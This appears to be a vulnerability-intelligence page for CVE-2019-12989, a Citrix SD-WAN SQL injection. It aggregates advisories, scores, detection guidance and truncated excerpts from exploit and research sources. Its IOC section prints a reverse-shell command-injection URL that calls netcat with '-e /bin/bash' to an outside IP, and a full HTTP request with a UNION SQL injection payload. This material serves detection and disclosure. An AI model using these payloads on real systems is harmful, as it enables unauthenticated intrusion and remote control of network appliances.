CVE-2019-12989
published 2019-07-16CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
94.05%
99.8th percentile
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_sd-wan | — | — |
| citrix | netscaler_adc_gateway | — | — |
| citrix | netscaler_sd-wan | >= 10.0.0 < 10.0.8 | 10.0.8 |
| citrix | sd-wan | — | — |
| citrix | sd-wan | >= 10.2.0 < 10.2.3 | 10.2.3 |
| citrix | xenserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`↗
otherfofa-query: (title="citrix sd-wan") && icon_hash="177980953"
sigma
POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
SSL_CLIENT_VERIFY: SUCCESS
{"get_package_file": {"site_name": "test' union select md5({{num}}), 'x', 'y', 'z' #","appliance_type": "primary","package_type": "active"}}- →Look for HTTP POST requests to /sdwan/nitro/v1/config/get_package_file?action=file_download with the custom header SSL_CLIENT_VERIFY: SUCCESS — this header is required to trigger the unauthenticated SQL injection. ↗
- →Detect SQL UNION-based injection payloads in the 'site_name' JSON field of POST requests to the get_package_file endpoint, particularly payloads containing INTO OUTFILE targeting /tmp/. ↗
- →Monitor for file creation in /tmp/ matching the pattern token_[0-9]+ by the 'mysql' user, which indicates successful SQL injection auth bypass. ↗
- →Detect GET requests to /cgi-bin/installpatch.cgi with backtick-enclosed commands in the 'installfile' parameter, indicating chained command injection (CVE-2019-12991) following auth bypass. ↗
- →A 400 HTTP response containing both 'status:"fail"' and 'Invalid value specified' from the get_package_file endpoint is the expected server response confirming successful SQL injection trigger. ↗
- →Monitor for execution of nc (netcat) with '-e /bin/bash' arguments spawned from the web server process, indicating reverse shell establishment post-exploitation. ↗
- →Alert on execution of user_management.pl with 'addUser' arguments from non-administrative contexts, indicating post-exploitation persistence via rogue admin account creation. ↗
- ·The SQL injection is only reachable when the HTTP header SSL_CLIENT_VERIFY is set to SUCCESS. In production deployments with a properly configured TLS terminating proxy, this header may be restricted — however, if the appliance is directly internet-exposed, no such protection exists. ↗
- ·The Nuclei detection template uses a DSL matcher that checks for both the error response body ('status:"fail"', 'Invalid value specified') AND the md5 hash of a random number in the body — the second condition confirms blind data exfiltration via error messages. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9q4p-22w8-h32x: Citrix SD-WAN 10
ghsa_unreviewed·2022-05-24
CVE-2019-12989 [HIGH] CWE-89 GHSA-9q4p-22w8-h32x: Citrix SD-WAN 10
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
VulnCheck
Citrix SD-WAN and NetScaler SQL Injection Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-12989 [CRITICAL] CWE-89 Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Citrix SD-WAN and NetScaler SD-WAN allow SQL Injection.
Affected: Citrix SD-WAN and NetScaler
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.researchgate.net/publication/348602660_An_analysis_of_the_use_of_CVEs_by_IoT_malware; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://app.crowdsec.net/cti/cve-explorer/CVE-2019-12989; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-10-31&host_type=src&vulnerability=cve-2019-12989; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-11-02&host_type=src&vulnerability=cve-2019-12989; https://dashboard.shadowserver.org/statistics/honeypot/vul
CISA
Citrix SD-WAN and NetScaler SQL Injection Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2019-12989 [CRITICAL] CWE-89 Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Vulnerability: Citrix SD-WAN and NetScaler SQL Injection Vulnerability
Affected: Citrix SD-WAN and NetScaler
Citrix SD-WAN and NetScaler SD-WAN allow SQL Injection.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-12989
Remediation Due Date: 2022-04-15
Citrix
CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
vendor_citrix·2019-07-16·CVSS 9.8
CVE-2019-12989 [CRITICAL] CWE-89 CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
CVE-2019-12989: Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 allow SQL Injection.
CISA KEV: Citrix SD-WAN and NetScaler SD-WAN allow SQL Injection.
Required Action: Apply updates per vendor instructions.
Citrix
Citrix SD-WAN Multiple Security Updates
vendor_citrix·CVSS 9.8
CVE-2019-12985 [CRITICAL] Citrix SD-WAN Multiple Security Updates
Citrix SD-WAN Multiple Security Updates
of Problem Multiple vulnerabilities have been identified in the management console of the Citrix SD-WAN Center and NetScaler SD-WAN Center. Multiple Vulnerabilities have also been identified on the Citrix SD-WAN Appliance and NetScaler SD-WAN Appliance. Collectively, these vulnerabilities could result in an unauthenticated attacker executing commands as root against the SD-WAN Center management console, or potentially be used to gain root privileges on the SD-WAN appliance. The vulnerabilities have been assigned the following CVE numbers. CVE-2019-12985 – Unauthenticated Command Injection in Citrix SD-WAN Center 10.2.x before 10.2.3 and NetScaler SD-WAN Center 10.0.x before 10.0.8. CVE-2019-12986 – Unauthenticated Command Injection in Citrix SD-WAN
No detection rules found.
Exploit-DB
Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution
exploitdb·2019-07-12·CVSS 9.8
CVE-2019-12991 [CRITICAL] Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution
Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution
---
# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution
# Date: 2019-07-12
# Exploit Author: Chris Lyne (@lynerc)
# Vendor Homepage: https://www.citrix.com
# Product: Citrix SD-WAN
# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/
# Version: Tested against 10.2.2
# Tested on:
# - Vendor-provided .OVA file
# CVE: CVE-2019-12989, CVE-2019-12991
#
# See Also:
# https://www.tenable.com/security/research/tra-2019-32
# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac
# https://support.citrix.com/article/CTX251987
#
# This code exploits both CVE-2019-12989 and CVE-2019-12991
# You'll need your own Netcat listener
import req
Nuclei
Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
nuclei·CVSS 9.8
CVE-2019-12989 [CRITICAL] Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in specific components, which could allow for execution of arbitrary SQL queries against the backend database. This could result in information disclosure, manipulation of data, or complete compromise of affected systems.
Template:
id: CVE-2019-12989
info:
name: Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
author: ritikchaddha
severity: critical
description: |
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in s
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Threat Research Center
Threat Research
Malware
## Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
Ruchna Nigam
Published: December 13, 2019
Malware
Threat Research
Vulnerabilities
Echobot
IoT
IoT Vulnerability
Mirai
Mirai variant
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploite
Unit42
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
blogs_unit42·2019-12-13
Mirai Variant ECHOBOT Resurfaces with 13 Previously Unexploited Vulnerabilities
## Executive Summary
Since the discovery of the Mirai variant using the binary name ECHOBOT in May 2019, it has resurfaced from time to time, using new infrastructure, and more remarkably, adding to the list of vulnerabilities it scans for, as a means to increase its attack surface with each evolution.
Unlike other Mirai variants, this particular variant stands out for the sheer number of exploits it incorporates, with the latest version having a total of 71 unique exploits, 13 of which haven’t been seen exploited in the wild until now, ranging from extremely old CVEs from as long back as 2003, to recent vulnerabilities made public as recently as early December 2019. Based on this seemingly odd choice, one could risk a guess that the attackers could potentially be aiming for the sweet sp
Tenable
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
blogs_tenable·2019-07-11
Multiple Vulnerabilities Found in Citrix SD-WAN Center and SD-WAN Appliances
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Citrix SD-WAN Appliance Multiple Vulnerabilities
blogs_tenable·2019-07-02
Citrix SD-WAN Appliance Multiple Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.htmlhttp://www.securityfocus.com/bid/109133https://support.citrix.com/article/CTX251987https://www.tenable.com/security/research/tra-2019-32http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.htmlhttp://www.securityfocus.com/bid/109133https://support.citrix.com/article/CTX251987https://www.tenable.com/security/research/tra-2019-32https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-12989
2019-07-16
Published
2022-03-25
Added to CISA KEV
Exploited in the wild